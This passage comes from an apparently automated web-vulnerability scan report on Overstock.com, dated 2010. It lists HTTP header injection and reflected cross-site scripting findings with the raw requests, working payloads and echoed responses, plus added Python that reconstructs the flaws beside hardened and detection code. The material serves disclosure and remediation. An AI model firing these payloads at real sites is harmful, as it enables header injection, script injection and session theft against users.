%26searchtype%3DHeader%26taxonomy%3D|searchhistory^keywords"; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63404

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j40.overstock.com ssl:f
...[SNIP]...

1.3. http://www.overstock.com/search [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload ca02f%0d%0aa7c5d88fad3 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=&keywords=%60&SearchType=Header&ca02f%0d%0aa7c5d88fad3=1 HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:49:14 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:49:14 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:49:14 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289321354456; Domain=.overstock.com; Path=/
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D`%26searchtype%3DHeader%26ca02f
a7c5d88fad3
%3D1%26taxonomy%3D|searchhistory^keywords"; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63224

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j38.overstock.com ssl:f
...[SNIP]...

1.4. http://www.overstock.com/search [taxonomy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /search

Issue detail

The value of the taxonomy request parameter is copied into the Set-Cookie response header. The payload f7bc4%0d%0a1641d061be5 was submitted in the taxonomy parameter. This caused a response containing an injected HTTP header.

Request

GET /search?taxonomy=f7bc4%0d%0a1641d061be5&keywords=%60&SearchType=Header HTTP/1.1
Host: www.overstock.com
Proxy-Connection: keep-alive
Referer: http://www.overstock.com/Sports-Toys/5/store.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSLB=B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; clubogiftcards=clubogctotal^0.00; se_list=se_list^0|2|; s_pers=%20gpv_p13%3DHomePage%2520-%2520New%2520Untracked%7C1289343466851%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doverstock.com%253D%252526pid%25253DHomePage%25252520-%25252520New%25252520Untracked%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.overstock.com/Sports-Toys/5/store.html%252526ot%25253DA%3B; ostk_aggr_session=csbshow^0|mxcshopmore^Sports-Toys/5/store.html|searchhistory^categories; cinfo=ccnt^0:ctmst^1289320132943; mxclastvisit=20101109; mxcsurftype=2

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:29:49 GMT
Server: Apache
Expires: Tue, 09 Nov 2010 16:29:49 GMT
Pragma: no-cache
Set-Cookie: ostk_campaign=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289320189875; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Fkeywords%3D`%26searchtype%3DHeader%26taxonomy%3Df7bc4
1641d061be5
|searchhistory^categories,keywords"; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101109; Domain=.overstock.com; Expires=Wed, 09-Nov-2011 16:29:49 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=2; Domain=.overstock.com; Path=/
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 63224

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j33.overstock.com ssl:f
...[SNIP]...
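Issues 1.3 and 1.4 above show the same defect from two angles: a request parameter (the taxonomy value in 1.4, an arbitrary parameter name in 1.3) is URL-decoded and copied into the ostk_aggr_session Set-Cookie header unchanged, so the %0d%0a inside the payload terminates the Set-Cookie line and whatever follows it begins a new header line. The Python below is an added example, not code from this report or from the site. The two server-side functions are a hypothetical reconstruction of the observed behaviour (vulnerable and hardened), the sample response is constructed in the shape of the one shown for 1.4, and the two checks do what the scanner's "Confidence: Certain" rests on: parse the raw response and report any header line that starts with the suffix half of the marker, or that is not of the form name: value.

```python
"""CRLF / HTTP header injection into Set-Cookie: vulnerable vs. hardened header
construction, plus a response-side check that spots the injected line.
Added example; the server code is a hypothetical reconstruction, not the site's."""
from __future__ import annotations
import re
from urllib.parse import quote, unquote

# Marker as submitted in the taxonomy parameter in issue 1.4: random prefix,
# percent-encoded CR LF, random suffix.
PREFIX, SUFFIX = "f7bc4", "1641d061be5"
PAYLOAD = f"{PREFIX}%0d%0a{SUFFIX}"

# Shape of the cookie the site emits; the parameter value lands at {}.
COOKIE_TEMPLATE = ('Set-Cookie: ostk_aggr_session="csbshow^0|mxcshopmore^/search%3Ftaxonomy%3D{}'
                   '|searchhistory^categories,keywords"; Domain=.overstock.com; Path=/')


def set_cookie_vulnerable(taxonomy: str) -> str:
    """Hypothetical reconstruction of the observed behaviour: the parameter is
    URL-decoded and written into the header verbatim, CR LF included."""
    return COOKIE_TEMPLATE.format(unquote(taxonomy))


def set_cookie_hardened(taxonomy: str) -> str:
    """Percent-encode the decoded value before it reaches the header (CR LF becomes
    %0D%0A), then apply the gate every header emitter should have: no CR or LF."""
    header = COOKIE_TEMPLATE.format(quote(unquote(taxonomy), safe=""))
    if "\r" in header or "\n" in header:
        raise ValueError("refusing to emit a header containing CR/LF")
    return header


# A header line must be an RFC 7230 token followed by a colon.
_HEADER_LINE = re.compile(r"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+:")


def header_lines(raw: bytes) -> list[str]:
    """Header lines of a raw HTTP response, status line excluded."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    return head.decode("iso-8859-1").split("\r\n")[1:]


def injected_lines(raw: bytes, marker: str) -> list[str]:
    """Lines that begin with the suffix marker: that can only happen if the CR LF
    from the request was written into the response unchanged."""
    return [line for line in header_lines(raw) if line.startswith(marker)]


def malformed_lines(raw: bytes) -> list[str]:
    """Marker-free variant: header lines that are not 'name: value'."""
    return [line for line in header_lines(raw) if not _HEADER_LINE.match(line)]


def build_response(set_cookie: str) -> bytes:
    """Constructed sample response in the shape of the one in the report."""
    return ("HTTP/1.1 200 OK\r\nServer: Apache\r\n" + set_cookie +
            "\r\nContent-Type: text/html;charset=iso-8859-1\r\n\r\n<html>").encode("iso-8859-1")


if __name__ == "__main__":
    vuln = build_response(set_cookie_vulnerable(PAYLOAD))
    print("injected header lines:", injected_lines(vuln, SUFFIX))
    print("malformed header lines:", malformed_lines(vuln))
    safe = build_response(set_cookie_hardened(PAYLOAD))
    print("after hardening:", injected_lines(safe, SUFFIX), malformed_lines(safe))
```

The marker check is the precise test (it is what turns a suspected CRLF reflection into a certain one); the name: value check is the cheap one to run over every response in a proxy log, since it needs no prior knowledge of the payload. In a real attack the text after %0d%0a would be a complete header such as a second Set-Cookie, which the marker check still catches and the grammar check by design does not.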

2. Cross-site scripting (reflected)
There are 536 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses: strict input validation on arrival (accept only the characters, length and format the field is expected to contain, and reject rather than sanitise anything else), and HTML-encoding of user input at every point where it is copied into a response (replacing HTML metacharacters such as < > " ' and = with the corresponding entities). In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
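The product-page instances that follow all share one pattern: every query-string parameter is re-emitted as a hidden form field, with the parameter name placed inside a double-quoted name attribute and no encoding, so a literal " in the name closes the attribute and the remainder of the name becomes new attributes on the input element. The Python below is an added example, not code from this report or from the site. It reconstructs that rendering as a hypothetical function, puts the two defensive layers beside it (output encoding alone, then validation plus encoding), and includes a small structural check that lists the attributes a rendered tag actually ends up with. The allow-list of parameter names and the value pattern are assumptions made for the example.

```python
"""Reflected XSS via an unencoded parameter name inside a quoted attribute:
the observed rendering, the encoded rendering, and validate-then-encode.
Added example; the vulnerable renderer is a hypothetical reconstruction."""
from __future__ import annotations
import html
import re
from urllib.parse import parse_qsl

# Query string exactly as sent in issue 2.1 (the "=" and ":" inside the
# parameter name are percent-encoded so the name survives query parsing).
QUERY = '38bd5"style%3d"x%3aexpression(alert(1))"b9c237e34ca=1'


def hidden_inputs_vulnerable(query: str) -> str:
    """Hypothetical reconstruction of the observed behaviour: raw name and value
    interpolated into double-quoted attributes."""
    return "".join(f'<input type="hidden" name="{k}" value="{v}"/>'
                   for k, v in parse_qsl(query, keep_blank_values=True))


def hidden_inputs_hardened(query: str) -> str:
    """Layer 2 only: HTML-encode at the point of output. quote=True turns " into
    &quot;, so nothing in the data can terminate the attribute."""
    return "".join(f'<input type="hidden" name="{html.escape(k, quote=True)}" '
                   f'value="{html.escape(v, quote=True)}"/>'
                   for k, v in parse_qsl(query, keep_blank_values=True))


# Layer 1: strict validation on arrival. Assumed for the example: a product page
# has a fixed set of parameters it knows how to echo, and values are short text.
ALLOWED_PARAMS = {"taxonomy", "keywords", "SearchType"}
_SAFE_VALUE = re.compile(r"^[A-Za-z0-9 _\-]{0,64}$")


def filtered_params(query: str) -> list[tuple[str, str]]:
    """Drop unknown parameter names and values outside the expected alphabet.
    Rejected input is discarded, not 'cleaned'."""
    return [(k, v) for k, v in parse_qsl(query, keep_blank_values=True)
            if k in ALLOWED_PARAMS and _SAFE_VALUE.match(v)]


def hidden_inputs_defended(query: str) -> str:
    """Both layers: validate, then encode."""
    return "".join(f'<input type="hidden" name="{html.escape(k, quote=True)}" '
                   f'value="{html.escape(v, quote=True)}"/>'
                   for k, v in filtered_params(query))


# Structural check: which attributes does the rendered tag actually carry?
# Deliberately no whitespace requirement before the name, because browsers accept
# name="a"style="..." as two attributes just as they accept name="a" style="...".
_ATTR = re.compile(r'([A-Za-z-]+)=("[^"]*")')


def attributes_in(rendered: str) -> list[str]:
    return [m.group(1) for m in _ATTR.finditer(rendered)]


def has_injected_attribute(rendered: str, expected=("type", "name", "value")) -> bool:
    """True if the markup contains an attribute the template never wrote."""
    return any(a not in expected for a in attributes_in(rendered))


if __name__ == "__main__":
    for label, render in (("vulnerable", hidden_inputs_vulnerable),
                          ("encoded", hidden_inputs_hardened),
                          ("validated+encoded", hidden_inputs_defended)):
        out = render(QUERY)
        print(f"{label}: {out}\n  attributes={attributes_in(out)} "
              f"injected={has_injected_attribute(out)}")
```

The vulnerable renderer reproduces the report's echoed tag byte for byte, and the attribute check reports the extra style attribute; after encoding the same input yields only type, name and value. Encoding is what removes the vulnerability in every browser; the validation layer additionally stops the site from echoing parameters it never defined, which is the root of "name of an arbitrarily supplied request parameter" findings.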


2.1. http://www.overstock.com/Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38bd5"style%3d"x%3aexpression(alert(1))"b9c237e34ca was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 38bd5"style="x:expression(alert(1))"b9c237e34ca in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (the request was sent with an MSIE 7.0 User-Agent) and may not work on other browsers; the underlying attribute break-out, a literal " closing the name attribute, is not browser-specific, so an event-handler attribute would serve in other browsers.

Request

GET /Baby/Blossom-Flower-13-piece-Crib-Bedding-Set/5230750/product.html?38bd5"style%3d"x%3aexpression(alert(1))"b9c237e34ca=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:04:10 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:04:10 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289405050856:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:10 GMT; Path=/
Set-Cookie: mxcproclicks=5230750|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:04:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 107662

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Bl
...[SNIP]...
<input type="hidden" name="38bd5"style="x:expression(alert(1))"b9c237e34ca" value="1"/>
...[SNIP]...

2.2. http://www.overstock.com/Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68f6f"style%3d"x%3aexpression(alert(1))"31807ecf3d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68f6f"style="x:expression(alert(1))"31807ecf3d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (the request was sent with an MSIE 7.0 User-Agent) and may not work on other browsers; the underlying attribute break-out, a literal " closing the name attribute, is not browser-specific, so an event-handler attribute would serve in other browsers.

Request

GET /Baby/Cybex-Oynx-Lightweight-Stroller-in-Slate/5148023/product.html?68f6f"style%3d"x%3aexpression(alert(1))"31807ecf3d6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:03:07 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:03:07 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404987817:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:07 GMT; Path=/
Set-Cookie: mxcproclicks=5148023|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:07 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 110949

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Cy
...[SNIP]...
<input type="hidden" name="68f6f"style="x:expression(alert(1))"31807ecf3d6" value="1"/>
...[SNIP]...

2.3. http://www.overstock.com/Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48c3e"style%3d"x%3aexpression(alert(1))"fb347059ff4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48c3e"style="x:expression(alert(1))"fb347059ff4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (the request was sent with an MSIE 7.0 User-Agent) and may not work on other browsers; the underlying attribute break-out, a literal " closing the name attribute, is not browser-specific, so an event-handler attribute would serve in other browsers.

Request

GET /Baby/Eddie-Bauer-Rocking-Wood-Bassinet/5033926/product.html?48c3e"style%3d"x%3aexpression(alert(1))"fb347059ff4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:03:16 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:03:16 GMT
Pragma: no-cache
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404996067:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:16 GMT; Path=/
Set-Cookie: mxcproclicks=5033926|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:03:16 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Keep-Alive: timeout=5, max=50
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102375

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j13.overstock.com ssl:false -->


<head>

<title>Ed
...[SNIP]...
<input type="hidden" name="48c3e"style="x:expression(alert(1))"fb347059ff4" value="1"/>
...[SNIP]...

2.4. http://www.overstock.com/Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9101"style%3d"x%3aexpression(alert(1))"646300c3d51 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9101"style="x:expression(alert(1))"646300c3d51 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC uses a dynamically evaluated CSS expression() inside an injected style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer (the request was sent with an MSIE 7.0 User-Agent) and may not work on other browsers; the underlying attribute break-out, a literal " closing the name attribute, is not browser-specific, so an event-handler attribute would serve in other browsers.

Request

GET /Baby/Fisher-Price-Zen-Collection-Cradle-Swing/5042811/product.html?b9101"style%3d"x%3aexpression(alert(1))"646300c3d51=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
